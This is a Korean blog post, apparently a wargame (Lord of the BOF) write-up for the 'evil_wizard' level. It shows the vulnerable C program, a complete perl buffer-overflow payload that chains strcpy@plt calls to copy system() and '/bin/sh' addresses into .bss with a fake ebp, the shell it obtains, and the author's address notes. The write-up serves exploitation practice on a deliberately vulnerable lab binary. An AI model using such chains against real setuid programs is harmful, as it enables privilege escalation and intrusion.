int $0x80

hell_fire -> evil_wizards 본문

워게임/Lord Of the BOF

hell_fire -> evil_wizards

cd80 cd80 2013.10.12 11:38

 

[hell_fire@Fedora_1stFloor ~]$ cat evil_wizard.c
/*
 The Lord of the BOF : The Fellowship of the BOF
 - evil_wizard
 - Local BOF on Fedora Core 3
 - hint : GOT overwriting
*/

// magic potion for you
void pop_pop_ret(void)
{
 asm("pop %eax");
 asm("pop %eax");
 asm("ret");
}
 
int main(int argc, char *argv[])
{
 char buffer[256];
 char saved_sfp[4];
 int length;

 if(argc < 2){
  printf("argv error\n");
  exit(0);
 }

 // for disturbance RET sleding
 length = strlen(argv[1]);
  
        // healing potion for you
        setreuid(geteuid(), geteuid());
        setregid(getegid(), getegid());

 // save sfp
 memcpy(saved_sfp, buffer+264, 4);
 
 // overflow!!
 strcpy(buffer, argv[1]);

 // restore sfp
 memcpy(buffer+264, saved_sfp, 4);

        // disturbance RET sleding
        memset(buffer+length, 0, (int)0xff000000 - (int)(buffer+length));

 printf("%s\n", buffer);
}
[hell_fire@Fedora_1stFloor ~]$ 

 

아래는 원래 텍스트가 길어서 짤려서 보기좋게 개행했습니다

[hell_fire@Fedora_1stFloor ~]$ ./evil_wizard $(perl -e 'print "A"x268,
"\xe8\x86\x04\x08", "A"x88, "\xac\x98\x04\x08", "\xe9\x86\
x04\x08"x100, "\x94\x84\x04\x08\x4f\x85\x04\x08\xb0\x98\
x04\x08\x2c\x85\x04\x08\x94\x84\x04\x08\x4f\x85\x04\x0
8\xb1\x98\x04\x08\x54\x81\x04\x08\x94\x84\x04\x08\x4f\
x85\x04\x08\xb2\x98\x04\x08\xc8\x82\x04\x08\x94\x84\x0
4\x08\x4f\x85\x04\x08\xb3\x98\x04\x08\xd7\x84\x04\x08\
x94\x84\x04\x08\x4f\x85\x04\x08\xb8\x98\x04\x08\x48\x81
\x04\x08\x94\x84\x04\x08\x4f\x85\x04\x08\xb9\x98\x04\x
08\xe0\x81\x04\x08\x94\x84\x04\x08\x4f\x85\x04\x08\xba
\x98\x04\x08\x23\x85\x04\x08\x94\x84\x04\x08\x4f\x85\x
04\x08\xbb\x98\x04\x08\xd7\x84\x04\x08", "\xe8\x86\x04\x08"')
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAH³.AAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAA¬....................................................................................鄄...............O°,O±TO²ȂO³ׄO¸HO¹Oº#O»ׄ脄
sh-3.00$ my-pass
euid = 504
get down like that
sh-3.00$

 

 

힌트는 got overwrite라고 돼있는데 어떻게 해야할질 모르겠어서

.bss에 system함수 주소와 /bin/sh 문자열 주소를 복사한 후 fake ebp해 풀었습니다

 

 

아래는 문제를 풀면서 작성한 노트입니다

 

/bin/sh  0x833603
system  0x7507c0
.bss  0x080498b0
strcpy@plt 0x08048494
ppr  0x0804854f
leaveret 0x080486e8
fakeebp  .bss-4 ( 0x080498ac )


0x0804852c 0xc0 0x080498b0 \xb0\x98\x04\x08\x2c\x85\x04\x08
0x08048154 0x07 0x080498b1 \xb1\x98\x04\x08\x54\x81\x04\x08
0x080482c8 0x75 0x080498b2 \xb2\x98\x04\x08\xc8\x82\x04\x08
0x080484d7 0x00 0x080498b3 \xb3\x98\x04\x08\xd7\x84\x04\x08

0x08048148 0x03 0x080498b8 \xb8\x98\x04\x08\x48\x81\x04\x08
0x080481e0 0x36 0x080498b9 \xb9\x98\x04\x08\xe0\x81\x04\x08
0x08048523 0x83 0x080498ba \xba\x98\x04\x08\x23\x85\x04\x08
0x080484d7 0x00 0x080498bb \xbb\x98\x04\x08\xd7\x84\x04\x08

strcpy + plt \x94\x84\x04\x08\x4f\x85\x04\x08

\xb0\x98\x04\x08\x2c\x85\x04\x08
\xb1\x98\x04\x08\x54\x81\x04\x08
\xb2\x98\x04\x08\xc8\x82\x04\x08
\xb3\x98\x04\x08\xd7\x84\x04\x08
\xb8\x98\x04\x08\x48\x81\x04\x08
\xb9\x98\x04\x08\xe0\x81\x04\x08
\xba\x98\x04\x08\x23\x85\x04\x08
\xbb\x98\x04\x08\xd7\x84\x04\x08

\x94\x84\x04\x08\x4f\x85\x04\x08\xb0\x98\x04\x08\x2c\x85\x04\x08\x94\x84\x04\x08\x4f\x85\x04\x08\xb1\x98\x04\x08\x54\x81\x04\x08\x94\x84\x04\x08\x4f\x85\x04\x08\xb2\x98\x04\x08\xc8\x82\x04\x08\x94\x84\x04\x08\x4f\x85\x04\x08\xb3\x98\x04\x08\xd7\x84\x04\x08\x94\x84\x04\x08\x4f\x85\x04\x08\xb8\x98\x04\x08\x48\x81\x04\x08\x94\x84\x04\x08\x4f\x85\x04\x08\xb9\x98\x04\x08\xe0\x81\x04\x08\x94\x84\x04\x08\x4f\x85\x04\x08\xba\x98\x04\x08\x23\x85\x04\x08\x94\x84\x04\x08\x4f\x85\x04\x08\xbb\x98\x04\x08\xd7\x84\x04\x08

 

 

신고

'워게임 > Lord Of the BOF' 카테고리의 다른 글

dark_stone -> cruel  (0) 2013.10.15
evil_wiard -> dark_stone  (0) 2013.10.15
hell_fire -> evil_wizards  (1) 2013.10.12
dark_eyes -> hell_fire  (0) 2013.10.10
1 Comments
댓글쓰기 폼